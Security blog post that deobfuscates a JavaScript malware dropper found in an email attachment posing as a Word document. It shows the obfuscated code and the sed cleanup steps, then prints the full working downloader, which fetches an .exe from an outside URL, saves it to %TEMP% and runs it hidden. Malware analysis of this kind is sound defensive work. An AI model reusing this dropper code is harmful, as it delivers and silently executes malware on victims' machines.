Today I came across some javascript madness inside of a file that initially appears as a Word Document in an email. Below is a picture of some of the madness:
var a=''; var b=''; function lq() { b = 'eval'; a += 'ADODB'; tqk(); }; function j() { b = 'eval'; a += 's.Exp'; eky(); }; function ye() { b = 'eval'; a += 'ti'; xk(); }; function rbx() { b = 'eval'; a += '357'; dke(); }; function mx() { b = 'eval'; a += 'ment'; fr(); }; function jp() { b = 'eval'; a += '+St'; rxh(); }; function uuz() { b = 'eval'; a += ' ca'; d(); };
As you can tell little pieces of the actual code scattered everywhere. To first deobfuscate the code I placed a line break between each semi-colon and new function.
cat file.txt | sed 's/function/\nfunction/g'
The above command just does a string substitution adding a new line in before the function call. Then I noticed the variable b='eval' never changes. So I removed it from the functions using sed once again:
cat newfile.txt | sed "s/b = 'eval';//"
Then after the code is assembled I knew it would execute in some fashion so looking through the code I found a line of this[b](a);. I modified the line in the code to read document.write(a) and then in a sandbox ran the javascript.
The output of the deofuscated code came out to be the below code:
function dl(fr,fn,rn)
+++ var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState === 4) { var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn,2); xa.close(); }; }; try { xo.open("GET",fr,false); xo.send(); if (rn > 0) { ws.Run(fn,0,0); }; } catch (er) { }; }; dl("hyyp://cancumisa.com.mx/document.php?id=<random number>&rnd=<random number>","69923439.exe",1)
The above javascript will create a file in the temp directory using wscript called 69923439.exe if it can download the file located at the URL listed.
The goal of this post was to display the deobfuscation of the badness.
Subscribe to:
Post Comments (Atom)
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist... -
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them... -
I ran a Nikto scan and found the following vulnerability in the report that it produces: "OSVDB-637: Enumeration of users is possible...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th... -
In the honeypot I found over 276 requests for cgi files that could be accessed to leverage the shellshock vulnerability documented as CVE-20...
No comments:
Post a Comment